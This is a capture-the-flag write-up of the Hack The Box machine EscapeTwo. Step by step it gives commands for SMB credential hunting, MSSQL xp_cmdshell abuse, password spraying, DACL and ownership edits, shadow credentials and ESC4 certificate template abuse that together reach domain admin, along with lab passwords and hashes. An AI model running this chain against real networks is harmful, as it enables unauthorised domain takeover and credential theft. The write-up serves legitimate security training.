As a cybersecurity enthusiast and red teamer in training, I’ve always found the complexity of Active Directory (AD) environments both fascinating and daunting. Hack The Box has consistently provided great hands-on learning opportunities, and EscapeTwo was no exception. This machine emulates a real-world Windows enterprise network, requiring a combination of enumeration, SMB exploitation, credential hunting, and MSSQL abuse to navigate through it.

This writeup reflects my step-by-step experience tackling EscapeTwo — from identifying exposed services to executing system commands via MSSQL. My goal with this post is to document my thought process, reinforce my learning, and share useful techniques with others on the same path.

Overview

Machine Name: EscapeTwo
IP Address: 10.10.11.51
Initial Creds: rose : KxEPkKe6R8su
Difficulty: Intermediate
Tech Stack: Active Directory, SMB, MSSQL, Windows Server 2019

Initial Reconnaissance

We start our enumeration by conducting a full TCP port scan along with service and version detection using Nmap:

nmap -p- -sV -sC -O 10.10.11.51

These ports clearly indicate that the target is part of a Windows Active Directory environment. SMB and Kerberos are immediate areas of interest.

SMB Enumeration

We have valid user credentials (rose : KxEPkKe6R8su), so we proceed to enumerate SMB shares:

Method 1: Using Nmap NSE scripts

nmap --script smb-enum-shares,smb-enum-users -p 445 10.10.11.51

Method 2: Using nxc

nxc smb 10.10.11.51 -u 'rose' -p 'KxEPkKe6R8su' --shares

This reveals multiple shares, including one particularly interesting one: Accounting Department (READ).

Exploiting SMB Share

We use smbclient to access the share and extract any sensitive documents:

smbclient //10.10.11.51/Accounting\ Department -U 'rose'

Once inside, we list and download the Excel documents:

ls
get accounts.xlsx
get accounting_2024.xlsx

File may not be as it seems. run: file filename to see the original format:

Now unziping the files downloaded in the local, look into every files, some files have usernames/passwords.

We found some usernames and passwords in xl/sharedStrings.xml

Converting xml to table in cmv

xmlstarlet sel -t -m "//si" -v "t" -n file.xml | awk 'NR<=5 {header[NR]=$0; next} {printf "%s\t", $0; if (NR%5==0) print ""}'

Trying to logging in to mssql to check credentials is correct or not.

nxc mssql 10.10.11.51 -u 'sa' -p  'MSSQLP@ssw0rd!' --local-auth

Connecting to database using impacket

python3 mssqlclient.py sa:'MSSQLP@ssw0rd!'@10.10.11.51

use single quote .

SELECT @@version; to see the version running.

Connected Successfully to the database and seen the version no.

SELECT name FROM sys.databases;

EXEC xp_cmdshell 'whoami';

If xp_cmdshell is disabled, enable it first:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Confirmation of the permission

EXEC sp_configure 'xp_cmdshell'

Post-Exploitation — File Discovery

EXEC xp_cmdshell ‘dir C:\*txt /s’; Searching for .txt files in C directory.

Nothing interesting here . So, we move onto next directories searching and we found SQL2019.

And let’s see if there are anything more interesting here.

Found the configurations files. So let’s read the configuration file to see the details.

Privilege Escalation via Configuration Files & Password Spraying

EXEC xp_cmdshell ‘type C:\SQL2019\ExpressAdv_ENV\sql-Configuration.INI’;

From here we got the SQLSVCPASSWORD:WqSZAF6CysDQbGb3

while checking, it got false, so we checked the passwords for other users using Password Spraying Method

1. Enumerate the username from here and keep it in the file named adusers.txt

nxc smb 10.10.11.51 -u ‘rose’ -p ‘KxEpkKe6R8su’ --users

2. Use the user list and

nxc winrm 10.10.11.51 -u adusers.txt -p WqSZAF6CysDQbGb3

Username ryan is confirmed for the extracted password.

Now checking for logging into ryan’s account.

Logging into ryan’s account using evil-winrm tool.

evil-winrm -i 10.10.11.51 -u ryan -p ‘WqSZAF6CysDQbGb3’

Now do to Desktop, there is the hash at text file.

Hash: 7cba1693ecbb29413a19cb2e87e4bea9

BloodHound Enumeration with SharpHound

Now, let’s use SharpHound to extract the details for BloodHound Analysis.

Now, download SharpHound and upload it https://github.com/SpecterOps/SharpHound/releases

upload SharpHound.exe
ls

.\SharpHound.exe --CollectionMethods All --ZipFileName output.zip

ls to see the output file

Using Impacket’s owneredit.py, we try to assign ownership:

python3 owneredit.py -action write -new-owner 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'

It will throw error mentioning no hosts configures.

sudo nano /etc/hosts

Add the ip: 10.10.11.51 and host: sequel.htb and try again:

This will successfully modify the user ryan and give write permission. To change the ownership of the object, we use Impacket's owneredit example script.

python3 owneredit.py -action write -new-owner 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'

To abuse ownership of a user object, we grant ourself the GenericAll privilege to ryan.

Impacket’s dacledit can be used for that purpose:

python3 dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3'

Certificate Abuse and Domain Admin Access

We use PyWhisker to enroll a certificate for ca_svc

python3 pywhisker.py -d "sequel.htb" -u "ryan" -p "WqSZAF6CysDQbGb3" --target "ca_svc" --action "add"

Now make note of two things:

key: vfPE5BZG.pfx

password: nODWEZzArQr6E3i5wbpl

Using PKINITtools, we obtain a TGT and NT hash

python PKINITtools/gettgtpkinit.py sequel.htb/ca_svc -cert-pfx vfPE5BZG.pfx -pfx-pass nODWEZzArQr6E3i5wbpl -dc-ip 10.10.11.51 escapetwo

TGT : 5d900ae62fe0eb483b9890d0902355618053e5325b9bf38752c2580d67dffbfb

python3 PKINITtools/getnthash.py sequel.htb/ca_svc -key 5d900ae62fe0eb483b9890d0902355618053e5325b9bf38752c2580d67dffbfb -dc-ip 10.10.11.51

NT Hash: 3b181b914e7a9d5508ea1e20bc2b7fce

Verify access using NT hash

nxc smb 10.10.11.51 -u ca_svc -H 3b181b914e7a9d5508ea1e20bc2b7fce

Discover certificate templates

certipy-ad find -u [email protected] -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.10.11.51 -debug

certipy-ad template -template DunderMifflinAuthentication -u [email protected] -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.10.11.51 -debug -save-old

Modifying the vulnerable template

certipy-ad template -template DunderMifflinAuthentication -u [email protected] -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.10.11.51 -debug

Confirming template vulnerabilities

certipy-ad find -u [email protected] -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -vulnerable

cat 20250129025005_Certipy.txt

Save and apply the template to the CA server

certipy-ad template -dc-ip 10.10.11.51 -u [email protected] -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -template DunderMifflinAuthentication -target DC01.sequel.htb -save-old

Request a certificate as the domain admin

certipy-ad req -ca sequel-DC01-CA -dc-ip 10.10.11.51 -u [email protected] -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -template DunderMifflinAuthentication -target dc01.sequel.htb -upn [email protected] -dns dc01.sequel.htb -debug

If error occured: sudo apt install ntpdate and redo again

Authenticate as administrator using the certificate

certipy-ad auth -pfx administrator_dc01.pfx

Login via evil-rm with the admin hash

evil-winrm -i 10.10.11.51 -u 'administrator' -H 7a8d4e04986afa8ed4060f75e5a0b3ff

Yayyy !!! Finally we got in !!! Now just retrieve the flag and submit.

cd ..\Desktop

ls

cat root.txt

EscapeTwo was a great learning experience that tied together multiple core concepts of Active Directory exploitation. From initial SMB enumeration to abusing MSSQL features and ultimately compromising the domain via misconfigured certificate services (ESC4), each step reinforced how crucial enumeration, lateral movement, and privilege escalation techniques are in red teaming. This machine sharpened my understanding of ADCS abuse and helped me get more comfortable with tools like Certipy, SharpHound, and Impacket. Overall, it was a solid challenge that mirrored real-world attack paths and deepened my confidence in navigating Windows enterprise environments.